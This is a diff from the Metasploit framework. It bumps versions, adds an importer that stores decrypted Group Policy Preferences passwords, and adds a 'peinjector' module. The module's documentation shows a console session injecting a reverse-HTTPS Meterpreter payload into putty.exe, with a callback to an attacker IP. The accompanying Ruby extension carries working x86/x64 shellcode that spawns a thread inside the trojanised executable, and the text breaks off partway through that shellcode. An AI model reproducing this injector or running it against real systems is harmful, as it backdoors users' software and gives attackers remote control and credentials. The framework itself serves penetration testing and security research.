merge changes
commit
14fa41a376
|
@ -18,7 +18,7 @@ PATH
|
||||||
metasploit-concern
|
metasploit-concern
|
||||||
metasploit-credential
|
metasploit-credential
|
||||||
metasploit-model
|
metasploit-model
|
||||||
metasploit-payloads (= 1.3.43)
|
metasploit-payloads (= 1.3.44)
|
||||||
metasploit_data_models
|
metasploit_data_models
|
||||||
metasploit_payloads-mettle (= 0.4.1)
|
metasploit_payloads-mettle (= 0.4.1)
|
||||||
mqtt
|
mqtt
|
||||||
|
@ -164,7 +164,7 @@ GEM
|
||||||
activemodel (~> 4.2.6)
|
activemodel (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
railties (~> 4.2.6)
|
railties (~> 4.2.6)
|
||||||
metasploit-payloads (1.3.43)
|
metasploit-payloads (1.3.44)
|
||||||
metasploit_data_models (3.0.0)
|
metasploit_data_models (3.0.0)
|
||||||
activerecord (~> 4.2.6)
|
activerecord (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
|
|
|
@ -7211,7 +7211,7 @@
|
||||||
],
|
],
|
||||||
"description": "Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.",
|
"description": "Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.",
|
||||||
"references": [
|
"references": [
|
||||||
"CVE-CVE-2018-6317",
|
"CVE-2018-6317",
|
||||||
"URL-https://www.exploit-db.com/exploits/43972/",
|
"URL-https://www.exploit-db.com/exploits/43972/",
|
||||||
"URL-https://github.com/nanopool/Claymore-Dual-Miner"
|
"URL-https://github.com/nanopool/Claymore-Dual-Miner"
|
||||||
],
|
],
|
||||||
|
@ -7221,7 +7221,7 @@
|
||||||
"arch": "",
|
"arch": "",
|
||||||
"rport": 3333,
|
"rport": 3333,
|
||||||
"targets": null,
|
"targets": null,
|
||||||
"mod_time": "2018-02-16 16:17:52 +0000",
|
"mod_time": "2018-08-28 13:34:02 +0000",
|
||||||
"path": "/modules/auxiliary/dos/tcp/claymore_dos.py",
|
"path": "/modules/auxiliary/dos/tcp/claymore_dos.py",
|
||||||
"is_install_path": true,
|
"is_install_path": true,
|
||||||
"ref_name": "dos/tcp/claymore_dos",
|
"ref_name": "dos/tcp/claymore_dos",
|
||||||
|
@ -46101,11 +46101,13 @@
|
||||||
"rport": 8080,
|
"rport": 8080,
|
||||||
"targets": [
|
"targets": [
|
||||||
"Unix (In-Memory)",
|
"Unix (In-Memory)",
|
||||||
|
"Windows (In-Memory)",
|
||||||
"Python (In-Memory)",
|
"Python (In-Memory)",
|
||||||
|
"PowerShell (In-Memory)",
|
||||||
"Linux (Dropper)",
|
"Linux (Dropper)",
|
||||||
"Windows (Dropper)"
|
"Windows (Dropper)"
|
||||||
],
|
],
|
||||||
"mod_time": "2017-09-08 13:59:29 +0000",
|
"mod_time": "2018-08-28 15:56:45 +0000",
|
||||||
"path": "/modules/exploits/multi/http/struts2_rest_xstream.rb",
|
"path": "/modules/exploits/multi/http/struts2_rest_xstream.rb",
|
||||||
"is_install_path": true,
|
"is_install_path": true,
|
||||||
"ref_name": "multi/http/struts2_rest_xstream",
|
"ref_name": "multi/http/struts2_rest_xstream",
|
||||||
|
@ -114528,6 +114530,33 @@
|
||||||
"post_auth": false,
|
"post_auth": false,
|
||||||
"default_credential": false
|
"default_credential": false
|
||||||
},
|
},
|
||||||
|
"post_windows/manage/peinjector": {
|
||||||
|
"name": "Peinjector",
|
||||||
|
"full_name": "post/windows/manage/peinjector",
|
||||||
|
"rank": 300,
|
||||||
|
"disclosure_date": null,
|
||||||
|
"type": "post",
|
||||||
|
"author": [
|
||||||
|
"Maximiliano Tedesco <maxitedesco1@gmail.com>"
|
||||||
|
],
|
||||||
|
"description": "This module will inject a specified windows payload into a target executable.",
|
||||||
|
"references": [
|
||||||
|
|
||||||
|
],
|
||||||
|
"is_server": false,
|
||||||
|
"is_client": false,
|
||||||
|
"platform": "Windows",
|
||||||
|
"arch": "",
|
||||||
|
"rport": null,
|
||||||
|
"targets": null,
|
||||||
|
"mod_time": "2018-08-28 11:33:17 +0000",
|
||||||
|
"path": "/modules/post/windows/manage/peinjector.rb",
|
||||||
|
"is_install_path": true,
|
||||||
|
"ref_name": "windows/manage/peinjector",
|
||||||
|
"check": false,
|
||||||
|
"post_auth": false,
|
||||||
|
"default_credential": false
|
||||||
|
},
|
||||||
"post_windows/manage/persistence_exe": {
|
"post_windows/manage/persistence_exe": {
|
||||||
"name": "Windows Manage Persistent EXE Payload Installer",
|
"name": "Windows Manage Persistent EXE Payload Installer",
|
||||||
"full_name": "post/windows/manage/persistence_exe",
|
"full_name": "post/windows/manage/persistence_exe",
|
||||||
|
|
|
@ -0,0 +1,98 @@
|
||||||
|
## Overview
|
||||||
|
This module inserts a payload into an existing PE file on a remote
|
||||||
|
machine. When a user launches the binary, the payload will run
|
||||||
|
as a thread within the process with the same privs.
|
||||||
|
|
||||||
|
## Module Options
|
||||||
|
LHOST IP of host that will receive the connection from the payload.
|
||||||
|
LPORT Port for Payload to connect to.
|
||||||
|
OPTIONS Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
|
||||||
|
PAYLOAD Windows Payload to inject into the targer executable.
|
||||||
|
SESSION The session to run this module on.
|
||||||
|
TARGETPE Path of the target executable to Path of the target executable to be injected
|
||||||
|
|
||||||
|
## Limitations
|
||||||
|
This process is not reverse-able. If you would like to return the
|
||||||
|
binary to it's original state, save a copy.
|
||||||
|
|
||||||
|
THE PAYLOAD WILL NOT SPAWN AN INDEPENDENT PROCESS/THREAD AND THE SESSION
|
||||||
|
WILL DIE WITH THE BINARY AND/OR WILL KILL THE BINARY WHEN THE SESSION
|
||||||
|
EXITS. Be careful closing sessions that were spawned using this method!
|
||||||
|
|
||||||
|
If a setting is wrong, it may cause the binary to fail to launch,
|
||||||
|
alerting the user to possible shinnanigans.
|
||||||
|
|
||||||
|
## Vulnerable Applications
|
||||||
|
`Vulnerable` is a bad term; this module inserts shellcode into a pe
|
||||||
|
file. That means any Windows pe files are `vulnerable`.
|
||||||
|
Be aware that some files like calc.exe on later Windows versions
|
||||||
|
are not entirely normal in their behvior and are not `vulnerable`
|
||||||
|
|
||||||
|
## Verification steps
|
||||||
|
* get session on target
|
||||||
|
* `use post/windows/manage/peinjector`
|
||||||
|
* `set payload <payload>`
|
||||||
|
* `set lport <lport>`
|
||||||
|
* `set lhost <lhost>`
|
||||||
|
* `set targetpe <*.exe>`
|
||||||
|
* `run`
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
```
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : WIN10X64-1511
|
||||||
|
OS : Windows 10 (Build 10586).
|
||||||
|
Architecture : x64
|
||||||
|
System Language : en_US
|
||||||
|
Domain : WORKGROUP
|
||||||
|
Logged On Users : 2
|
||||||
|
Meterpreter : x64/windows
|
||||||
|
meterpreter > background
|
||||||
|
[*] Backgrounding session 1...
|
||||||
|
msf5 exploit(multi/handler) > use post/windows/manage/peinjector
|
||||||
|
msf5 post(windows/manage/peinjector) > show options
|
||||||
|
|
||||||
|
Module options (post/windows/manage/peinjector):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
LHOST yes IP of host that will receive the connection from the payload.
|
||||||
|
LPORT 4433 no Port for Payload to connect to.
|
||||||
|
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
|
||||||
|
PAYLOAD windows/meterpreter/reverse_https no Windows Payload to inject into the targer executable.
|
||||||
|
SESSION yes The session to run this module on.
|
||||||
|
TARGETPE no Path of the target executable to be injected
|
||||||
|
|
||||||
|
msf5 post(windows/manage/peinjector) > set lhost 192.168.135.111
|
||||||
|
lhost => 192.168.135.111
|
||||||
|
msf5 post(windows/manage/peinjector) > set lport 4561
|
||||||
|
lport => 4561
|
||||||
|
msf5 post(windows/manage/peinjector) > set payload windows/x64/meterpreter/reverse_https
|
||||||
|
payload => windows/x64/meterpreter/reverse_https
|
||||||
|
msf5 post(windows/manage/peinjector) > set session 1
|
||||||
|
session => 1
|
||||||
|
msf5 post(windows/manage/peinjector) > set targetpe 'C:\users\msfuser\downloads\puttyx64.exe'
|
||||||
|
targetpe => C:\users\msfuser\downloads\puttyx64.exe
|
||||||
|
msf5 post(windows/manage/peinjector) > show options
|
||||||
|
|
||||||
|
Module options (post/windows/manage/peinjector):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
LHOST 192.168.135.111 yes IP of host that will receive the connection from the payload.
|
||||||
|
LPORT 4561 no Port for Payload to connect to.
|
||||||
|
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
|
||||||
|
PAYLOAD windows/x64/meterpreter/reverse_https no Windows Payload to inject into the targer executable.
|
||||||
|
SESSION 1 yes The session to run this module on.
|
||||||
|
TARGETPE C:\users\msfuser\downloads\puttyx64.exe no Path of the target executable to be injected
|
||||||
|
|
||||||
|
msf5 post(windows/manage/peinjector) > run
|
||||||
|
|
||||||
|
[*] Running module against WIN10X64-1511
|
||||||
|
[*] Generating payload
|
||||||
|
[*] Injecting Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) into the executable C:\users\msfuser\downloads\puttyx64.exe
|
||||||
|
[+] Successfully injected payload into the executable: C:\users\msfuser\downloads\puttyx64.exe
|
||||||
|
[*] Post module execution completed
|
||||||
|
msf5 post(windows/manage/peinjector) >
|
||||||
|
```
|
||||||
|
|
|
@ -21,6 +21,7 @@ module Msf::DBManager::Import
|
||||||
autoload :CI, 'msf/core/db_manager/import/ci'
|
autoload :CI, 'msf/core/db_manager/import/ci'
|
||||||
autoload :Foundstone, 'msf/core/db_manager/import/foundstone'
|
autoload :Foundstone, 'msf/core/db_manager/import/foundstone'
|
||||||
autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm'
|
autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm'
|
||||||
|
autoload :GPP, 'msf/core/db_manager/import/gpp'
|
||||||
autoload :IP360, 'msf/core/db_manager/import/ip360'
|
autoload :IP360, 'msf/core/db_manager/import/ip360'
|
||||||
autoload :IPList, 'msf/core/db_manager/import/ip_list'
|
autoload :IPList, 'msf/core/db_manager/import/ip_list'
|
||||||
autoload :Libpcap, 'msf/core/db_manager/import/libpcap'
|
autoload :Libpcap, 'msf/core/db_manager/import/libpcap'
|
||||||
|
@ -47,6 +48,7 @@ module Msf::DBManager::Import
|
||||||
include Msf::DBManager::Import::CI
|
include Msf::DBManager::Import::CI
|
||||||
include Msf::DBManager::Import::Foundstone
|
include Msf::DBManager::Import::Foundstone
|
||||||
include Msf::DBManager::Import::FusionVM
|
include Msf::DBManager::Import::FusionVM
|
||||||
|
include Msf::DBManager::Import::GPP
|
||||||
include Msf::DBManager::Import::IP360
|
include Msf::DBManager::Import::IP360
|
||||||
include Msf::DBManager::Import::IPList
|
include Msf::DBManager::Import::IPList
|
||||||
include Msf::DBManager::Import::Libpcap
|
include Msf::DBManager::Import::Libpcap
|
||||||
|
@ -164,6 +166,7 @@ module Msf::DBManager::Import
|
||||||
# :ci_xml
|
# :ci_xml
|
||||||
# :foundstone_xml
|
# :foundstone_xml
|
||||||
# :fusionvm_xml
|
# :fusionvm_xml
|
||||||
|
# :gpp_xml
|
||||||
# :ip360_aspl_xml
|
# :ip360_aspl_xml
|
||||||
# :ip360_xml_v3
|
# :ip360_xml_v3
|
||||||
# :ip_list
|
# :ip_list
|
||||||
|
@ -358,6 +361,9 @@ module Msf::DBManager::Import
|
||||||
when "main"
|
when "main"
|
||||||
@import_filedata[:type] = "Outpost24 XML"
|
@import_filedata[:type] = "Outpost24 XML"
|
||||||
return :outpost24_xml
|
return :outpost24_xml
|
||||||
|
when /Groups|DataSources|Drives|ScheduledTasks|NTServices/
|
||||||
|
@import_filedata[:type] = "Group Policy Preferences Credentials"
|
||||||
|
return :gpp_xml
|
||||||
else
|
else
|
||||||
# Give up if we haven't hit the root tag in the first few lines
|
# Give up if we haven't hit the root tag in the first few lines
|
||||||
break if line_count > 10
|
break if line_count > 10
|
||||||
|
|
|
@ -0,0 +1,41 @@
|
||||||
|
require 'rex/parser/group_policy_preferences'
|
||||||
|
|
||||||
|
module Msf::DBManager::Import::GPP
|
||||||
|
def import_gpp_xml(args = {}, &block)
|
||||||
|
return unless args && args[:data] && !args[:data].empty?
|
||||||
|
|
||||||
|
gpp = Rex::Parser::GPP.parse(args[:data])
|
||||||
|
|
||||||
|
return unless gpp && gpp.any?
|
||||||
|
|
||||||
|
wspace = find_workspace(args[:workspace])
|
||||||
|
|
||||||
|
return unless wspace && wspace.respond_to?(:id)
|
||||||
|
|
||||||
|
gpp.each do |p|
|
||||||
|
# Skip incomplete creds
|
||||||
|
next unless p[:USER] && p[:PASS]
|
||||||
|
|
||||||
|
# Store decrypted creds
|
||||||
|
create_credential(
|
||||||
|
workspace_id: wspace.id,
|
||||||
|
origin_type: :import,
|
||||||
|
filename: args[:filename],
|
||||||
|
username: p[:USER],
|
||||||
|
private_data: p[:PASS],
|
||||||
|
private_type: :password
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Store entire file as loot, including metadata
|
||||||
|
report_loot(
|
||||||
|
workspace: wspace,
|
||||||
|
path: args[:filename],
|
||||||
|
name: File.basename(args[:filename]),
|
||||||
|
data: args[:data],
|
||||||
|
type: 'microsoft.windows.gpp',
|
||||||
|
ctype: 'text/xml',
|
||||||
|
info: gpp
|
||||||
|
)
|
||||||
|
end
|
||||||
|
end
|
|
@ -1493,6 +1493,7 @@ public
|
||||||
# * :ci_xml
|
# * :ci_xml
|
||||||
# * :foundstone_xml
|
# * :foundstone_xml
|
||||||
# * :fusionvm_xml
|
# * :fusionvm_xml
|
||||||
|
# * :gpp_xml
|
||||||
# * :ip360_aspl_xml
|
# * :ip360_aspl_xml
|
||||||
# * :ip360_xml_v3
|
# * :ip360_xml_v3
|
||||||
# * :ip_list
|
# * :ip_list
|
||||||
|
|
|
@ -1428,6 +1428,7 @@ class Db
|
||||||
print_line " CI"
|
print_line " CI"
|
||||||
print_line " Foundstone"
|
print_line " Foundstone"
|
||||||
print_line " FusionVM XML"
|
print_line " FusionVM XML"
|
||||||
|
print_line " Group Policy Preferences Credentials"
|
||||||
print_line " IP Address List"
|
print_line " IP Address List"
|
||||||
print_line " IP360 ASPL"
|
print_line " IP360 ASPL"
|
||||||
print_line " IP360 XML v3"
|
print_line " IP360 XML v3"
|
||||||
|
|
|
@ -0,0 +1,247 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
require 'rex/post/meterpreter/extensions/peinjector/tlv'
|
||||||
|
|
||||||
|
module Rex
|
||||||
|
module Post
|
||||||
|
module Meterpreter
|
||||||
|
module Extensions
|
||||||
|
module Peinjector
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# This meterpreter extensions allow to inject a given shellcode into an executable file.
|
||||||
|
#
|
||||||
|
###
|
||||||
|
class Peinjector < Extension
|
||||||
|
def initialize(client)
|
||||||
|
super(client, 'peinjector')
|
||||||
|
|
||||||
|
client.register_extension_aliases(
|
||||||
|
[
|
||||||
|
{
|
||||||
|
'name' => 'peinjector',
|
||||||
|
'ext' => self
|
||||||
|
}
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def inject_shellcode(opts = {})
|
||||||
|
return nil unless opts[:shellcode]
|
||||||
|
|
||||||
|
request = Packet.create_request('peinjector_inject_shellcode')
|
||||||
|
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE, opts[:shellcode])
|
||||||
|
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE, opts[:size])
|
||||||
|
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64, opts[:isx64])
|
||||||
|
request.add_tlv(TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE, opts[:targetpe])
|
||||||
|
|
||||||
|
response = client.send_request(request)
|
||||||
|
|
||||||
|
error_msg = response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
|
||||||
|
raise error_msg if error_msg
|
||||||
|
return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
|
||||||
|
end
|
||||||
|
|
||||||
|
def add_thread_x86(payload)
|
||||||
|
stackpreserve = "\x90\x90\x60\x9c" # AUTOMATED ASM: x86 = ['nop', 'nop', 'pushad', 'pushfd']
|
||||||
|
shellcode = "\xE8\xB7\xFF\xFF\xFF" # AUTOMATED ASM: x86 = ['call 0xffffffbc']
|
||||||
|
shellcode += payload
|
||||||
|
|
||||||
|
thread = "\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B" + # AUTOMATED ASM: x86 = ['cld', 'nop', 'call 0xc8', 'pushad', 'mov ebp, esp', 'xor edx, edx', 'nop', 'invalid']
|
||||||
|
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02" + # AUTOMATED ASM: x86 = ['push edx', 'xor [ebx+0x528b0c52], cl', 'adc al, 0xeb', 'invalid']
|
||||||
|
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" + # AUTOMATED ASM: x86 = ['inc ecx', 'adc [ebx-0x48f0d78e], cl', 'dec edx', 'xor edi, edi', 'xor eax, eax', 'lodsb', 'cmp al, 0x61']
|
||||||
|
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B" + # AUTOMATED ASM: x86 = ['jl 0x4', 'sub al, 0x20', 'ror edi, 0xd', 'add edi, eax', 'dec ecx', 'jnz 0xfffffffb', 'push edx', 'nop', 'push edi', 'invalid']
|
||||||
|
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48" + # AUTOMATED ASM: x86 = ['push edx', 'adc [eax+0x13c428b], dl', 'rcl byte [eax-0x1487bf75], 1', 'pop es', 'invalid']
|
||||||
|
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0" + # AUTOMATED ASM: x86 = ['inc edx', 'add al, 0x85', 'jl 0x3f', 'test eax, eax', 'jz 0x75', 'nop', 'add eax, edx']
|
||||||
|
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B" + # AUTOMATED ASM: x86 = ['push eax', 'nop', 'mov ecx, [eax+0x18]', 'mov ebx, [eax+0x20]', 'add ebx, edx', 'jecxz 0x64', 'dec ecx', 'mov esi, [ebx+ecx*4]']
|
||||||
|
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF" + # AUTOMATED ASM: x86 = ['add esi, edx', 'xor edi, edi', 'nop', 'xor eax, eax', 'jmp 0xd', 'jmp far dword [ecx-0x2b]', 'invalid']
|
||||||
|
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D" + # AUTOMATED ASM: x86 = ['or eax, 0xe038c701', 'jmp 0xc', 'jg 0x24', 'shr bl, cl', 'retf 0xe675', 'invalid']
|
||||||
|
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B" + # AUTOMATED ASM: x86 = ['clc', 'cmp edi, [ebp+0x24]', 'jnz 0xffffffda', 'pop eax', 'nop', 'mov ebx, [eax+0x24]', 'add ebx, edx', 'nop', 'invalid']
|
||||||
|
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04" + # AUTOMATED ASM: x86 = ['or al, 0x4b', 'mov ebx, [eax+0x1c]', 'add ebx, edx', 'nop', 'jmp 0xe', 'int 0x97', 'int1', 'mov cl, 0x8b', 'invalid']
|
||||||
|
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB" + # AUTOMATED ASM: x86 = ['mov eax, [ecx]', 'rcl byte [eax+0x24244489], 1', 'pop ebx', 'pop ebx', 'popad', 'nop', 'pop ecx', 'pop edx', 'push ecx', 'invalid']
|
||||||
|
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90" + # AUTOMATED ASM: x86 = ['add [edi], ecx', 'jmp eax', 'pop eax', 'nop', 'pop edi', 'pop edx', 'mov edx, [edx]', 'jmp 0xffffff62', 'nop']
|
||||||
|
"\x5D\x90" + # AUTOMATED ASM: x86 = ['pop ebp', 'nop'] x64 = ['pop rbp', 'nop']
|
||||||
|
"\xBE" # AUTOMATED ASM: x86 = ['invalid'] x64 = ['invalid']
|
||||||
|
|
||||||
|
thread +=[shellcode.length - 5].pack("V")
|
||||||
|
|
||||||
|
thread += "\x90\x6A\x40\x90\x68\x00\x10\x00\x00" + # AUTOMATED ASM: x86 = ['nop', 'push 0x40', 'nop', 'push 0x1000']
|
||||||
|
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90" + # AUTOMATED ASM: x86 = ['push esi', 'nop', 'push 0x0', 'push 0xe553a458', 'call ebp', 'mov ebx, eax', 'mov edi, eax', 'nop']
|
||||||
|
"\x89\xF1" # AUTOMATED ASM: x86 = ['mov ecx, esi'] x64 = ['mov ecx, esi']
|
||||||
|
|
||||||
|
thread += "\xeb\x44" # <--length of shellcode below # AUTOMATED ASM: x86 = ['jmp 0x46']
|
||||||
|
|
||||||
|
thread += "\x90\x5e" # AUTOMATED ASM: x86 = ['nop', 'pop esi']
|
||||||
|
|
||||||
|
thread += "\x90\x90\x90" + # AUTOMATED ASM: x86 = ['nop', 'nop', 'nop']
|
||||||
|
"\xF2\xA4" + # AUTOMATED ASM: x86 = ['repne movsb']
|
||||||
|
"\xE8\x20\x00\x00" + # AUTOMATED ASM: x86 = ['invalid']
|
||||||
|
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06" + # AUTOMATED ASM: x86 = ['add [ebx+0xa2a1de0], bh', 'nop', 'push 0x9dbd95a6', 'call ebp', 'cmp al, 0x6']
|
||||||
|
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF" + # AUTOMATED ASM: x86 = ['jl 0xc', 'cmp bl, 0xe0', 'jnz 0xc', 'mov ebx, 0x6f721347', 'push 0x0', 'push ebx', 'invalid']
|
||||||
|
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5" + # AUTOMATED ASM: x86 = ['aad 0x31', 'rcl byte [eax+0x50], 0x50', 'push ebx', 'push eax', 'push eax', 'push 0x160d6838', 'call ebp']
|
||||||
|
"\x58\x58\x90\x61" # AUTOMATED ASM: x86 = ['pop eax', 'pop eax', 'nop', 'popad']
|
||||||
|
|
||||||
|
thread += "\xe9" # AUTOMATED ASM: x86 = ['invalid']
|
||||||
|
|
||||||
|
thread += [shellcode.length].pack("V")
|
||||||
|
return stackpreserve + thread + shellcode
|
||||||
|
end
|
||||||
|
|
||||||
|
def add_thread_x64(payload)
|
||||||
|
|
||||||
|
stackpreserve = "\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50" + # AUTOMATED ASM: x64 = ['nop', 'push rax', 'push rbx', 'push rcx', 'push rdx', 'push rsi', 'push rdi', 'push rbp', 'push r8']
|
||||||
|
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c" # AUTOMATED ASM: x64 = ['push r9', 'push r10', 'push r11', 'push r12', 'push r13', 'push r14', 'push r15', 'pushfq']
|
||||||
|
|
||||||
|
shellcode = "\xE8\xB8\xFF\xFF\xFF" # AUTOMATED ASM: x64 = ['call 0xffffffffffffffbd']
|
||||||
|
|
||||||
|
shellcode += payload
|
||||||
|
|
||||||
|
thread = "\x90" + # <--THAT'S A NOP. \o/ # AUTOMATED ASM: x64 = ['nop']
|
||||||
|
"\xe8\xc0\x00\x00\x00" + # jmp to allocate # AUTOMATED ASM: x64 = ['call 0xc5']
|
||||||
|
# api_call
|
||||||
|
"\x41\x51" + # push r9
|
||||||
|
"\x41\x50" + # push r8
|
||||||
|
"\x52" + # push rdx
|
||||||
|
"\x51" + # push rcx
|
||||||
|
"\x56" + # push rsi
|
||||||
|
"\x48\x31\xD2" + # xor rdx,rdx
|
||||||
|
"\x65\x48\x8B\x52\x60" + # mov rdx,qword ptr gs:[rdx+96]
|
||||||
|
"\x48\x8B\x52\x18" + # mov rdx,qword ptr [rdx+24]
|
||||||
|
"\x48\x8B\x52\x20" + # mov rdx,qword ptr[rdx+32]
|
||||||
|
|
||||||
|
# next_mod
|
||||||
|
"\x48\x8b\x72\x50" + # mov rsi,[rdx+80]
|
||||||
|
"\x48\x0f\xb7\x4a\x4a" + # movzx rcx,word [rdx+74]
|
||||||
|
"\x4d\x31\xc9" + # xor r9,r9
|
||||||
|
|
||||||
|
# loop_modname
|
||||||
|
"\x48\x31\xc0" + # xor rax,rax
|
||||||
|
"\xac" + # lodsb
|
||||||
|
"\x3c\x61" + # cmp al, 61h (a)
|
||||||
|
"\x7c\x02" + # jl 02h
|
||||||
|
"\x2c\x20" + # sub al, 0x20
|
||||||
|
|
||||||
|
# not_lowercase
|
||||||
|
"\x41\xc1\xc9\x0d" + # ror r9d, 13
|
||||||
|
"\x41\x01\xc1" + # add r9d, eax
|
||||||
|
"\xe2\xed" + # loop until read, back to xor rax, rax
|
||||||
|
"\x52" + # push rdx ;Save the current position in the module list
|
||||||
|
"\x41\x51" + # push r9 ; Save the current module hash for later
|
||||||
|
# ; Proceed to iterate the export address table,
|
||||||
|
"\x48\x8b\x52\x20" + # mov rdx, [rdx+32] ; Get this modules base address
|
||||||
|
"\x8b\x42\x3c" + # mov eax, dword [rdx+60] ; Get PE header
|
||||||
|
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
|
||||||
|
"\x8b\x80\x88\x00\x00\x00" + # mov eax, dword [rax+136] ; Get export tables RVA
|
||||||
|
"\x48\x85\xc0" + # test rax, rax ; Test if no export address table
|
||||||
|
"\x74\x67" + # je get_next_mod1 ; If no EAT present, process the nex
|
||||||
|
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
|
||||||
|
"\x50" + # push rax ; Save the current modules EAT
|
||||||
|
"\x8b\x48\x18" + # mov ecx, dword [rax+24] ; Get the number of function
|
||||||
|
"\x44\x8b\x40\x20" + # mov r8d, dword [rax+32] ; Get the rva of the function
|
||||||
|
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
|
||||||
|
|
||||||
|
# get_next_func: ;
|
||||||
|
"\xe3\x56" + # jrcxz get_next_mod; When we reach the start of the EAT
|
||||||
|
"\x48\xff\xc9" + # dec rcx ; Decrement the function name counter
|
||||||
|
"\x41\x8b\x34\x88" + # mov esi, dword [r8+rcx*4]; Get rva of next module name
|
||||||
|
"\x48\x01\xd6" + # add rsi, rdx ; Add the modules base address
|
||||||
|
"\x4d\x31\xc9" + # xor r9, r9 ; Clear r9 which will store the hash
|
||||||
|
# ; And compare it to the one we wan
|
||||||
|
# loop_funcname: ;
|
||||||
|
"\x48\x31\xc0" + # xor rax, rax ; Clear rax
|
||||||
|
"\xac" + # lodsb ; Read in the next byte of the ASCII funct name
|
||||||
|
"\x41\xc1\xc9\x0d" + # ror r9d, 13 ; Rotate right our hash value
|
||||||
|
"\x41\x01\xc1" + # add r9d, eax ; Add the next byte of the name
|
||||||
|
"\x38\xe0" + # cmp al, ah ; Compare AL to AH (null)
|
||||||
|
"\x75\xf1" + # jne loop_funcname ; continue
|
||||||
|
"\x4c\x03\x4c\x24\x08" + # add r9, [rsp+8] ; Add the current module hash
|
||||||
|
"\x45\x39\xd1" + # cmp r9d, r10d ; Compare the hash
|
||||||
|
"\x75\xd8" + # jnz get_next_func ; Go compute the next function hash
|
||||||
|
|
||||||
|
"\x58" + # pop rax ; Restore the current modules EAT
|
||||||
|
"\x44\x8b\x40\x24" + # mov r8d, dword [rax+36] ; Get the ordinal table rva
|
||||||
|
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
|
||||||
|
"\x66\x41\x8b\x0c\x48" + # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
|
||||||
|
"\x44\x8b\x40\x1c" + # mov r8d, dword [rax+28] ; Get the funct addr table rva
|
||||||
|
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
|
||||||
|
"\x41\x8b\x04\x88" + # mov eax, dword [r8+4*rcx]; Get the desired func RVA
|
||||||
|
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
|
||||||
|
|
||||||
|
# finish:
|
||||||
|
"\x41\x58" + # pop r8 ; Clear off the current modules hash
|
||||||
|
"\x41\x58" + # pop r8 ;Clear off the curr position in the module list
|
||||||
|
"\x5E" + # pop rsi ; Restore RSI
|
||||||
|
"\x59" + # pop rcx ; Restore the 1st parameter
|
||||||
|
"\x5A" + # pop rdx ; Restore the 2nd parameter
|
||||||
|
"\x41\x58" + # pop r8 ; Restore the 3rd parameter
|
||||||
|
"\x41\x59" + # pop r9 ; Restore the 4th parameter
|
||||||
|
"\x41\x5A" + # pop r10 ; pop off the return address
|
||||||
|
